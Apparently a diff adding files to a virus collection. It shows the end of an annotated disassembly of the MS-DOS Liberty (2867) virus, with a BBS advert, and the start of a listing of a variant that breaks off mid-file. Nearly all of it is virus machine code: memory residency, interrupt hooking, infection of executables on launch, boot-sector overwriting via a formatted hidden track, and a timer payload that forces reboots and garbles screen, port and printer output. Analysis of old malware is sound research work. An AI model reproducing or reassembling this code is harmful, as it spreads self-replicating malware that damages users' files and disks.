+CS:0786 7281 JB 0709
+CS:0788 B80803 MOV AX,0308 ;
+CS:078B BB1001 MOV BX,0110 ;
+CS:078E B93128 MOV CX,2831 ;
+CS:0791 9C PUSHF ;
+CS:0792 2E CS: ;
+CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus
+CS:0797 E96FFF JMP 0709
+CS:079A 2E CS: ;
+CS:079B C606100300 MOV BYTE PTR [0310],00 ;
+CS:07A0 E83B00 CALL 07DE ; Attach ???
+CS:07A3 E963FF JMP 0709
+;
+; The format table is next
+;
+DS:07A0 28 00-31 02 28 00 32 02 28 00
+DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00
+DS:07C0 37 02 28 00 38 02 28 00-3F 02
+;
+; Revectoring
+;
+CS:07CA 33C0 XOR AX,AX
+CS:07CC 8ED8 MOV DS,AX
+CS:07CE FA CLI
+CS:07CF 2E CS:
+CS:07D0 A11407 MOV AX,[0714]
+CS:07D3 A34C00 MOV [004C],AX
+CS:07D6 2E CS:
+CS:07D7 A11607 MOV AX,[0716]
+CS:07DA A34E00 MOV [004E],AX
+CS:07DD C3 RET
+CS:07DE 2E CS:
+CS:07DF A11407 MOV AX,[0714]
+CS:07E2 2E CS:
+CS:07E3 A30C03 MOV [030C],AX
+CS:07E6 2E CS:
+CS:07E7 A11607 MOV AX,[0716]
+CS:07EA 2E CS:
+CS:07EB A30E03 MOV [030E],AX
+CS:07EE B8F702 MOV AX,02F7
+CS:07F1 2E CS:
+CS:07F2 A31407 MOV [0714],AX
+CS:07F5 2E CS:
+CS:07F6 8C0E1607 MOV [0716],CS
+CS:07FA C3 RET
+;
+; Boot sectors are infected via vector 13h
+;
+CS:07FB 9C PUSHF
+CS:07FC 80FC03 CMP AH,03
+CS:07FF 7213 JB 0814
+CS:0801 80FC05 CMP AH,05
+CS:0804 730E JNB 0814
+CS:0806 80FA80 CMP DL,80
+CS:0809 720F JB 081A
+CS:080B EB07 JMP 0814
+CS:080D 90 NOP
+CS:080E 07 POP ES
+CS:080F 1F POP DS
+CS:0810 5A POP DX
+CS:0811 59 POP CX
+CS:0812 5B POP BX
+CS:0813 58 POP AX
+CS:0814 9D POPF
+CS:0815 EA00000000 JMP 0000:0000
+CS:081A 50 PUSH AX
+CS:081B 53 PUSH BX
+CS:081C 51 PUSH CX
+CS:081D 52 PUSH DX
+CS:081E 1E PUSH DS
+CS:081F 06 PUSH ES
+CS:0820 2E CS:
+CS:0821 803E0C0401 CMP BYTE PTR [040C],01
+CS:0826 74E6 JZ 080E
+CS:0828 B80102 MOV AX,0201 ;
+CS:082B 0E PUSH CS ;
+CS:082C 07 POP ES ;
+CS:082D 0E PUSH CS ;
+CS:082E 1F POP DS ;
+CS:082F BB420C MOV BX,0C42 ;
+CS:0832 B90100 MOV CX,0001 ;
+CS:0835 32F6 XOR DH,DH ;
+CS:0837 9C PUSHF ;
+CS:0838 2E CS: ;
+CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector
+CS:083D 72CF JB 080E
+CS:083F 0E PUSH CS
+CS:0840 1F POP DS
+CS:0841 0E PUSH CS
+CS:0842 07 POP ES
+CS:0843 BE420C MOV SI,0C42 ;
+CS:0846 BF3506 MOV DI,0635 ;
+CS:0849 B90A00 MOV CX,000A ;
+CS:084C FC CLD ;
+CS:084D F3 REPZ ;
+CS:084E A7 CMPSW ; Check infection
+CS:084F 74BD JZ 080E
+CS:0851 B0FF MOV AL,FF
+CS:0853 884702 MOV [BX+02],AL
+CS:0856 B80905 MOV AX,0509 ;
+CS:0859 BBA607 MOV BX,07A6 ;
+CS:085C B93128 MOV CX,2831 ;
+CS:085F 9C PUSHF ;
+CS:0860 2E CS: ;
+CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28
+CS:0865 72A7 JB 080E
+CS:0867 B80103 MOV AX,0301 ;
+CS:086A BB420C MOV BX,0C42 ;
+CS:086D B93F28 MOV CX,283F ;
+CS:0870 9C PUSHF ;
+CS:0871 2E CS: ;
+CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector
+CS:0876 7296 JB 080E
+CS:0878 B80103 MOV AX,0301 ;
+CS:087B BB3506 MOV BX,0635 ;
+CS:087E B90100 MOV CX,0001 ;
+CS:0881 9C PUSHF ;
+CS:0882 2E CS: ;
+CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector
+CS:0887 7285 JB 080E
+CS:0889 B80803 MOV AX,0308 ;
+CS:088C BB1001 MOV BX,0110 ;
+CS:088F B93128 MOV CX,2831 ;
+CS:0892 9C PUSHF ;
+CS:0893 2E CS: ;
+CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector
+CS:0898 E973FF JMP 080E
+CS:089B 9C PUSHF
+CS:089C 50 PUSH AX
+CS:089D 1E PUSH DS
+CS:089E 33C0 XOR AX,AX
+CS:08A0 8ED8 MOV DS,AX
+CS:08A2 833E860000 CMP WORD PTR [0086],+00 ;
+CS:08A7 750F JNZ 08B8 ; Check if DOS is installed
+CS:08A9 833E840000 CMP WORD PTR [0084],+00 ;
+CS:08AE 7508 JNZ 08B8
+CS:08B0 1F POP DS
+CS:08B1 58 POP AX
+CS:08B2 9D POPF
+CS:08B3 EA00000000 JMP 0000:0000
+CS:08B8 06 PUSH ES
+CS:08B9 0E PUSH CS
+CS:08BA 07 POP ES
+CS:08BB E8C3F9 CALL 0281 ; Get vector 21h
+CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h
+CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h
+CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag
+CS:08C7 07 POP ES
+CS:08C8 EBE6 JMP 08B0
+;
+; Revectoring
+;
+CS:08CA A12000 MOV AX,[0020]
+CS:08CD 2E CS:
+CS:08CE A3B408 MOV [08B4],AX
+CS:08D1 A12200 MOV AX,[0022]
+CS:08D4 2E CS:
+CS:08D5 A3B608 MOV [08B6],AX
+CS:08D8 B89B08 MOV AX,089B
+CS:08DB FA CLI
+CS:08DC A32000 MOV [0020],AX
+CS:08DF 8C0E2200 MOV [0022],CS
+CS:08E3 C3 RET
+CS:08E4 33C0 XOR AX,AX
+CS:08E6 8ED8 MOV DS,AX
+CS:08E8 FA CLI
+CS:08E9 2E CS:
+CS:08EA A1B408 MOV AX,[08B4]
+CS:08ED A32000 MOV [0020],AX
+CS:08F0 2E CS:
+CS:08F1 A1B608 MOV AX,[08B6]
+CS:08F4 A32200 MOV [0022],AX
+CS:08F7 C3 RET
+CS:08F8 A17000 MOV AX,[0070]
+CS:08FB 2E CS:
+CS:08FC A3900A MOV [0A90],AX
+CS:08FF A17200 MOV AX,[0072]
+CS:0902 2E CS:
+CS:0903 A3920A MOV [0A92],AX
+CS:0906 B8580A MOV AX,0A58
+CS:0909 FA CLI
+CS:090A A37000 MOV [0070],AX
+CS:090D 8C0E7200 MOV [0072],CS
+CS:0911 C3 RET
+;
+; The next routine displays 'M A G I C ! !' on the screen for a second
+;
+CS:0912 50 PUSH AX
+CS:0913 53 PUSH BX
+CS:0914 51 PUSH CX
+CS:0915 52 PUSH DX
+CS:0916 56 PUSH SI
+CS:0917 57 PUSH DI
+CS:0918 1E PUSH DS
+CS:0919 06 PUSH ES
+CS:091A 9C PUSHF
+CS:091B BB00B8 MOV BX,B800 ;
+CS:091E 8EDB MOV DS,BX ;
+CS:0920 0E PUSH CS ;
+CS:0921 07 POP ES ;
+CS:0922 33F6 XOR SI,SI ;
+CS:0924 BF6809 MOV DI,0968 ;
+CS:0927 B9A000 MOV CX,00A0 ;
+CS:092A F3 REPZ ;
+CS:092B A4 MOVSB ; Save screen
+CS:092C BB00B8 MOV BX,B800 ;
+CS:092F 8EC3 MOV ES,BX ;
+CS:0931 0E PUSH CS ;
+CS:0932 1F POP DS ;
+CS:0933 33FF XOR DI,DI ;
+CS:0935 BB080A MOV BX,0A08 ;
+CS:0938 B95000 MOV CX,0050 ;
+CS:093B B6CE MOV DH,CE ;
+CS:093D 8A17 MOV DL,[BX] ;
+CS:093F 80EA03 SUB DL,03 ;
+CS:0942 26 ES: ;
+CS:0943 8915 MOV [DI],DX ;
+CS:0945 47 INC DI ;
+CS:0946 47 INC DI ;
+CS:0947 43 INC BX ;
+CS:0948 E2F3 LOOP 093D ; Put text on screen
+CS:094A E2FE LOOP 094A ; Wait
+CS:094C BB00B8 MOV BX,B800 ;
+CS:094F 8EC3 MOV ES,BX ;
+CS:0951 0E PUSH CS ;
+CS:0952 1F POP DS ;
+CS:0953 33FF XOR DI,DI ;
+CS:0955 BE6809 MOV SI,0968 ;
+CS:0958 B9A000 MOV CX,00A0 ;
+CS:095B F3 REPZ ;
+CS:095C A4 MOVSB ; Restore screen
+CS:095D 9D POPF
+CS:095E 07 POP ES
+CS:095F 1F POP DS
+CS:0960 5F POP DI
+CS:0961 5E POP SI
+CS:0962 5A POP DX
+CS:0963 59 POP CX
+CS:0964 5B POP BX
+CS:0965 58 POP AX
+CS:0966 C3 RET
+;
+; A temporary screen buffer
+;
+DS:0960 4D 41 47 49 43 4D 41 47
+DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49
+DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43
+DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D
+DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41
+DS:09B0 47 49 43 4D 41
47 49 43-4D 41 47 49 43 4D 41 47 +DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:0A00 47 49 43 4D 41 47 49 43 +; +; The encrypted text 'M A G I C ! !' +; +DS:0A00 23 23 23 23 23 23 23 23 +DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23 +DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23 +DS:0A50 23 23 23 23 23 23 23 23 +; +; The next routine is the timer routine. It activates all the gadgets. +; +CS:0A58 9C PUSHF +CS:0A59 50 PUSH AX +CS:0A5A 1E PUSH DS +CS:0A5B 2E CS: +CS:0A5C FF06940A INC WORD PTR [0A94] +CS:0A60 2E CS: +CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ? +CS:0A66 7433 JZ 0A9B +CS:0A68 2E CS: +CS:0A69 A1980A MOV AX,[0A98] +CS:0A6C 2E CS: +CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ? +CS:0A71 7430 JZ 0AA3 +CS:0A73 7217 JB 0A8C +CS:0A75 050002 ADD AX,0200 +CS:0A78 2E CS: +CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ? +CS:0A7D 7446 JZ 0AC5 +CS:0A7F 770B JA 0A8C +CS:0A81 2E CS: +CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ? 
+CS:0A87 7503 JNZ 0A8C
+CS:0A89 E886FE CALL 0912 ; Mess up screen
+CS:0A8C 1F POP DS
+CS:0A8D 58 POP AX
+CS:0A8E 9D POPF
+CS:0A8F EA00000000 JMP 0000:0000 ; Continue
+CS:0A9B B8FFFF MOV AX,FFFF
+CS:0A9E 50 PUSH AX
+CS:0A9F 33C0 XOR AX,AX
+CS:0AA1 50 PUSH AX
+CS:0AA2 CB RETF
+CS:0AA3 2E CS:
+CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150
+CS:0AAA 33C0 XOR AX,AX
+CS:0AAC 8ED8 MOV DS,AX
+CS:0AAE 2E CS:
+CS:0AAF C606470B00 MOV BYTE PTR [0B47],00
+CS:0AB4 90 NOP
+CS:0AB5 2E CS:
+CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00
+CS:0ABB 90 NOP
+CS:0ABC 2E CS:
+CS:0ABD C606080C00 MOV BYTE PTR [0C08],00
+CS:0AC2 90 NOP
+CS:0AC3 EBC7 JMP 0A8C
+CS:0AC5 2E CS:
+CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF
+CS:0ACB 90 NOP
+CS:0ACC 2E CS:
+CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF
+CS:0AD2 90 NOP
+CS:0AD3 2E CS:
+CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF
+CS:0AD9 90 NOP
+CS:0ADA 2E CS:
+CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000
+CS:0AE1 2E CS:
+CS:0AE2 FF06960A INC WORD PTR [0A96]
+CS:0AE6 EBA4 JMP 0A8C
+CS:0AE8 A14000 MOV AX,[0040]
+CS:0AEB 2E CS:
+CS:0AEC A3430B MOV [0B43],AX
+CS:0AEF A14200 MOV AX,[0042]
+CS:0AF2 2E CS:
+CS:0AF3 A3450B MOV [0B45],AX
+CS:0AF6 B8360B MOV AX,0B36
+CS:0AF9 FA CLI
+CS:0AFA A34000 MOV [0040],AX
+CS:0AFD 8C0E4200 MOV [0042],CS
+CS:0B01 C3 RET
+CS:0B02 FA CLI
+CS:0B03 A15000 MOV AX,[0050]
+CS:0B06 2E CS:
+CS:0B07 A3910B MOV [0B91],AX
+CS:0B0A A15200 MOV AX,[0052]
+CS:0B0D 2E CS:
+CS:0B0E A3930B MOV [0B93],AX
+CS:0B11 B8840B MOV AX,0B84
+CS:0B14 A35000 MOV [0050],AX
+CS:0B17 8C0E5200 MOV [0052],CS
+CS:0B1B C3 RET
+CS:0B1C FA CLI
+CS:0B1D A15C00 MOV AX,[005C]
+CS:0B20 2E CS:
+CS:0B21 A3040C MOV [0C04],AX
+CS:0B24 A15E00 MOV AX,[005E]
+CS:0B27 2E CS:
+CS:0B28 A3060C MOV [0C06],AX
+CS:0B2B B8FC0B MOV AX,0BFC
+CS:0B2E A35C00 MOV [005C],AX
+CS:0B31 8C0E5E00 MOV [005E],CS
+CS:0B35 C3 RET
+;
+; Now the gadgets' routines. When activated, only the word MAGIC!! will be
+; sent to screen, port, and printer.
+;
+CS:0B36 9C PUSHF ; Screen
+CS:0B37 80FC09 CMP AH,09
+CS:0B3A 740F JZ 0B4B
+CS:0B3C 80FC0A CMP AH,0A
+CS:0B3F 740A JZ 0B4B
+CS:0B41 9D POPF
+CS:0B42 EA00000000 JMP 0000:0000
+CS:0B4B 2E CS:
+CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF
+CS:0B51 74EE JZ 0B41
+CS:0B53 53 PUSH BX
+CS:0B54 56 PUSH SI
+CS:0B55 50 PUSH AX
+CS:0B56 33DB XOR BX,BX
+CS:0B58 2E CS:
+CS:0B59 833E480B07 CMP WORD PTR [0B48],+07
+CS:0B5E 7507 JNZ 0B67
+CS:0B60 2E CS:
+CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000
+CS:0B67 2E CS:
+CS:0B68 8B1E480B MOV BX,[0B48]
+CS:0B6C 2E CS:
+CS:0B6D 8B3E480B MOV DI,[0B48]
+CS:0B71 47 INC DI
+CS:0B72 2E CS:
+CS:0B73 893E480B MOV [0B48],DI
+CS:0B77 BE3B0C MOV SI,0C3B
+CS:0B7A 58 POP AX
+CS:0B7B 2E CS:
+CS:0B7C 8A00 MOV AL,[BX+SI]
+CS:0B7E FEC0 INC AL
+CS:0B80 5E POP SI
+CS:0B81 5B POP BX
+CS:0B82 EBBD JMP 0B41
+CS:0B84 9C PUSHF ; Port
+CS:0B85 80FC01 CMP AH,01
+CS:0B88 740D JZ 0B97
+CS:0B8A 80FC02 CMP AH,02
+CS:0B8D 7436 JZ 0BC5
+CS:0B8F 9D POPF
+CS:0B90 EA00000000 JMP 0000:0000
+CS:0B97 2E CS:
+CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF
+CS:0B9D 74F0 JZ 0B8F
+CS:0B9F 53 PUSH BX
+CS:0BA0 56 PUSH SI
+CS:0BA1 33DB XOR BX,BX
+CS:0BA3 2E CS:
+CS:0BA4 8A1E960B MOV BL,[0B96]
+CS:0BA8 BE3B0C MOV SI,0C3B
+CS:0BAB 2E CS:
+CS:0BAC 8A00 MOV AL,[BX+SI]
+CS:0BAE 2E CS:
+CS:0BAF FE06960B INC BYTE PTR [0B96]
+CS:0BB3 2E CS:
+CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07
+CS:0BB9 7506 JNZ 0BC1
+CS:0BBB 2E CS:
+CS:0BBC C606960B00 MOV BYTE PTR [0B96],00
+CS:0BC1 5E POP SI
+CS:0BC2 5B POP BX
+CS:0BC3 EBCA JMP 0B8F
+CS:0BC5 2E CS:
+CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF
+CS:0BCB 74C2 JZ 0B8F
+CS:0BCD 2E CS:
+CS:0BCE FF1E910B CALL FAR [0B91]
+CS:0BD2 80FC00 CMP AH,00
+CS:0BD5 7F24 JG 0BFB
+CS:0BD7 53 PUSH BX
+CS:0BD8 56 PUSH SI
+CS:0BD9 33DB XOR BX,BX
+CS:0BDB 2E CS:
+CS:0BDC 8A1E960B MOV BL,[0B96]
+CS:0BE0 BE3B0C MOV SI,0C3B
+CS:0BE3 2E CS:
+CS:0BE4 8A00 MOV AL,[BX+SI]
+CS:0BE6 2E CS:
+CS:0BE7 FE06960B INC BYTE PTR [0B96]
+CS:0BEB 2E CS:
+CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07
+CS:0BF1 7506 JNZ 0BF9
+CS:0BF3 2E CS:
+CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00
+CS:0BF9 5E POP SI
+CS:0BFA 5B POP BX
+CS:0BFB CF IRET
+CS:0BFC 9C PUSHF ; Printer
+CS:0BFD 80FC00 CMP AH,00
+CS:0C00 7407 JZ 0C09
+CS:0C02 9D POPF
+CS:0C03 EA00000000 JMP 0000:0000
+CS:0C09 2E CS:
+CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF
+CS:0C0F 74F1 JZ 0C02
+CS:0C11 53 PUSH BX
+CS:0C12 56 PUSH SI
+CS:0C13 33DB XOR BX,BX
+CS:0C15 2E CS:
+CS:0C16 8A1E3A0C MOV BL,[0C3A]
+CS:0C1A BE3B0C MOV SI,0C3B
+CS:0C1D 2E CS:
+CS:0C1E 8A00 MOV AL,[BX+SI]
+CS:0C20 FEC0 INC AL
+CS:0C22 2E CS:
+CS:0C23 FE063A0C INC BYTE PTR [0C3A]
+CS:0C27 2E CS:
+CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07
+CS:0C2D 7507 JNZ 0C36
+CS:0C2F 2E CS:
+CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00
+CS:0C35 90 NOP
+CS:0C36 5E POP SI
+CS:0C37 5B POP BX
+CS:0C38 EBC8 JMP 0C02
+;
+; The encrypted text 'MAGIC!!'
+;
+DS:0C3A 4C 40 46 48 42 20 20
+;
+; Important note:
+; When there is no longer space on the disk to infect a file, the Liberty
+; virus will infect the bootsector. This is done in the 'OHIO' way.
+;
+;
+;
+; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort.
+; This document may be freely shared. If you have any comments or some
+; nice little viruses for analysis, feel free to drop me a note.
+;
+; Remco van Helvoort
+; Bredastraat 3
+; 5224 VD 's-Hertogenbosch
+; Holland
+;
+
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.libertyb.lst b/MSDOS/Virus.MSDOS.Unknown.libertyb.lst
new file mode 100644
index 00000000..ad39d293
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.libertyb.lst
@@ -0,0 +1,1194 @@
+CS:0110 EB79 JMP 018B
+CS:0112 90 NOP
+;
+; The program's original infomation is stored between these sections
+;
+CS:018B 2E CS:
+CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
+CS:0191 7403 JZ 0196
+CS:0193 1F POP DS
+CS:0194 59 POP CX
+CS:0195 5B POP BX
+CS:0196 50 PUSH AX
+CS:0197 53 PUSH BX
+CS:0198 51 PUSH CX
+CS:0199 52 PUSH DX
+CS:019A 1E PUSH DS
+CS:019B 06 PUSH ES
+CS:019C 1E PUSH DS
+CS:019D 0E PUSH CS
+CS:019E 1F POP DS
+CS:019F E8CD00 CALL 026F ; Installation check
+CS:01A2 3DFFFF CMP AX,FFFF
+CS:01A5 741A JZ 01C1
+CS:01A7 E8D700 CALL 0281 ; Get vector 21h
+CS:01AA 07 POP ES
+CS:01AB 06 PUSH ES
+CS:01AC 8CC0 MOV AX,ES
+CS:01AE 48 DEC AX
+CS:01AF 8ED8 MOV DS,AX
+CS:01B1 E8DC00 CALL 0290 ; Adjust MCB
+CS:01B4 8EC0 MOV ES,AX
+CS:01B6 0E PUSH CS
+CS:01B7 1F POP DS
+CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory
+CS:01BB E8F400 CALL 02B2 ; Set vector 21h
+CS:01BE E80101 CALL 02C2 ; Set installation flag
+CS:01C1 2E CS:
+CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
+CS:01C7 7417 JZ 01E0 +CS:01C9 07 POP ES +CS:01CA 0E PUSH CS +CS:01CB 1F POP DS +CS:01CC E80901 CALL 02D8 ; Decrypt header +CS:01CF E81901 CALL 02EB ; Restore header +CS:01D2 07 POP ES +CS:01D3 1F POP DS +CS:01D4 5A POP DX +CS:01D5 59 POP CX +CS:01D6 5B POP BX +CS:01D7 58 POP AX +CS:01D8 1E PUSH DS +CS:01D9 BF0001 MOV DI,0100 +CS:01DC 57 PUSH DI +CS:01DD 33FF XOR DI,DI +CS:01DF CB RETF ; Start file +CS:01E0 FA CLI +CS:01E1 5E POP SI +CS:01E2 07 POP ES +CS:01E3 1F POP DS +CS:01E4 5A POP DX +CS:01E5 59 POP CX +CS:01E6 5B POP BX +CS:01E7 58 POP AX +CS:01E8 2E CS: +CS:01E9 8B3E2C06 MOV DI,[062C] +CS:01ED 03FE ADD DI,SI +CS:01EF 8ED7 MOV SS,DI +CS:01F1 2E CS: +CS:01F2 8B3E2E06 MOV DI,[062E] +CS:01F6 8BE7 MOV SP,DI ; Restore stack +CS:01F8 2E CS: +CS:01F9 8B3E2806 MOV DI,[0628] +CS:01FD 03FE ADD DI,SI +CS:01FF 57 PUSH DI +CS:0200 2E CS: +CS:0201 FF362A06 PUSH [062A] +CS:0205 33F6 XOR SI,SI +CS:0207 EBD4 JMP 01DD ; Start file +; +; The encrypted Liberty header for .COM files +; +DS:0200 1D 69 D9 00 01 01 +DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02 +DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92 +DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81 +DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A +DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6 +DS:0260 46 E5 20 02 +; +; Various subroutines used by the virus +; +CS:026F 2E CS: +CS:0270 8A1E6A02 MOV BL,[026A] +CS:0274 32FF XOR BH,BH +CS:0276 33C0 XOR AX,AX +CS:0278 8ED8 MOV DS,AX +CS:027A D1E3 SHL BX,1 +CS:027C D1E3 SHL BX,1 +CS:027E 8B07 MOV AX,[BX] +CS:0280 C3 RET +CS:0281 A18400 MOV AX,[0084] +CS:0284 2E CS: +CS:0285 A38C03 MOV [038C],AX +CS:0288 A18600 MOV AX,[0086] +CS:028B 2E CS: +CS:028C A38E03 MOV [038E],AX +CS:028F C3 RET +CS:0290 BB4221 MOV BX,2142 +CS:0293 B104 MOV CL,04 +CS:0295 D3EB SHR BX,CL +CS:0297 291E0300 SUB [0003],BX +CS:029B A10300 MOV AX,[0003] +CS:029E 03060100 ADD AX,[0001] +CS:02A2 A31200 MOV [0012],AX +CS:02A5 40 INC AX +CS:02A6 C3 RET +CS:02A7 BF1001 MOV 
DI,0110 +CS:02AA 8BF7 MOV SI,DI +CS:02AC B99A05 MOV CX,059A +CS:02AF F3 REPZ +CS:02B0 A5 MOVSW +CS:02B1 C3 RET +CS:02B2 33C0 XOR AX,AX +CS:02B4 8ED8 MOV DS,AX +CS:02B6 FA CLI +CS:02B7 B86C03 MOV AX,036C +CS:02BA A38400 MOV [0084],AX +CS:02BD 8C068600 MOV [0086],ES +CS:02C1 C3 RET +CS:02C2 FA CLI +CS:02C3 B8FFFF MOV AX,FFFF +CS:02C6 2E CS: +CS:02C7 8A1E6A02 MOV BL,[026A] +CS:02CB 32FF XOR BH,BH +CS:02CD D1E3 SHL BX,1 +CS:02CF D1E3 SHL BX,1 +CS:02D1 8907 MOV [BX],AX +CS:02D3 40 INC AX +CS:02D4 894702 MOV [BX+02],AX +CS:02D7 C3 RET +CS:02D8 B93C00 MOV CX,003C +CS:02DB BE1301 MOV SI,0113 +CS:02DE 2E CS: +CS:02DF 8B14 MOV DX,[SI] +CS:02E1 D3CA ROR DX,CL +CS:02E3 2E CS: +CS:02E4 8914 MOV [SI],DX +CS:02E6 46 INC SI +CS:02E7 46 INC SI +CS:02E8 E2F4 LOOP 02DE +CS:02EA C3 RET +CS:02EB BF0001 MOV DI,0100 +CS:02EE BE1301 MOV SI,0113 +CS:02F1 B93C00 MOV CX,003C +CS:02F4 F3 REPZ +CS:02F5 A5 MOVSW +CS:02F6 C3 RET +; +; I am not sure what the next routine is supposed to be doing. +; +CS:02F7 9C PUSHF +CS:02F8 2E CS: +CS:02F9 803E100301 CMP BYTE PTR [0310],01 +CS:02FE 740A JZ 030A +CS:0300 80FC03 CMP AH,03 +CS:0303 7505 JNZ 030A +CS:0305 80FA80 CMP DL,80 +CS:0308 7207 JB 0311 +CS:030A 9D POPF +CS:030B EA00000000 JMP 0000:0000 +CS:0311 06 PUSH ES +CS:0312 0E PUSH CS +CS:0313 07 POP ES +CS:0314 B80902 MOV AX,0209 +CS:0317 BB420C MOV BX,0C42 +CS:031A B90100 MOV CX,0001 +CS:031D 9C PUSHF +CS:031E 2E CS: +CS:031F FF1E0C03 CALL FAR [030C] +CS:0323 72E5 JB 030A +CS:0325 B80905 MOV AX,0509 +CS:0328 BB4803 MOV BX,0348 +CS:032B B93100 MOV CX,0031 +CS:032E 9C PUSHF +CS:032F 2E CS: +CS:0330 FF1E0C03 CALL FAR [030C] +CS:0334 72D4 JB 030A +CS:0336 B80903 MOV AX,0309 +CS:0339 BB420C MOV BX,0C42 +CS:033C B93100 MOV CX,0031 +CS:033F 9C PUSHF +CS:0340 2E CS: +CS:0341 FF1E0C03 CALL FAR [030C] +CS:0345 07 POP ES +CS:0346 9D POPF +CS:0347 CF IRET +; +; Another format table used by the virus +; +DS:0340 00 00 31 02 00 00 32 02 +DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02 +DS:0360 00 00 37 02 
00 00 38 02-00 00 39 02 +; +; The virus infects files by monitoring function 4Bh of vector 21h +; +CS:036C 9C PUSHF +CS:036D 3D004B CMP AX,4B00 ; Execute function ? +CS:0370 741E JZ 0390 +CS:0372 EB16 JMP 038A +CS:0374 90 NOP +CS:0375 E8B901 CALL 0531 ; Close file +CS:0378 E89A00 CALL 0415 ; Restore vectors +CS:037B C6060C04FF MOV BYTE PTR [040C],FF +CS:0380 90 NOP +CS:0381 9D POPF +CS:0382 07 POP ES +CS:0383 1F POP DS +CS:0384 5F POP DI +CS:0385 5E POP SI +CS:0386 5A POP DX +CS:0387 59 POP CX +CS:0388 5B POP BX +CS:0389 58 POP AX +CS:038A 9D POPF +CS:038B EA77142C02 JMP 022C:1477 ; Continue +CS:0390 50 PUSH AX +CS:0391 53 PUSH BX +CS:0392 51 PUSH CX +CS:0393 52 PUSH DX +CS:0394 56 PUSH SI +CS:0395 57 PUSH DI +CS:0396 1E PUSH DS +CS:0397 06 PUSH ES +CS:0398 9C PUSHF +CS:0399 E8A600 CALL 0442 ; Set error vectors +CS:039C E8E100 CALL 0480 ; Open file +CS:039F 72D4 JB 0375 +CS:03A1 0E PUSH CS +CS:03A2 1F POP DS +CS:03A3 0E PUSH CS +CS:03A4 07 POP ES +CS:03A5 A30A04 MOV [040A],AX +CS:03A8 93 XCHG BX,AX +CS:03A9 C6060C0401 MOV BYTE PTR [040C],01 +CS:03AE 90 NOP +CS:03AF E8D800 CALL 048A ; Read file header +CS:03B2 72C1 JB 0375 +CS:03B4 BB1301 MOV BX,0113 +CS:03B7 2E CS: +CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ? 
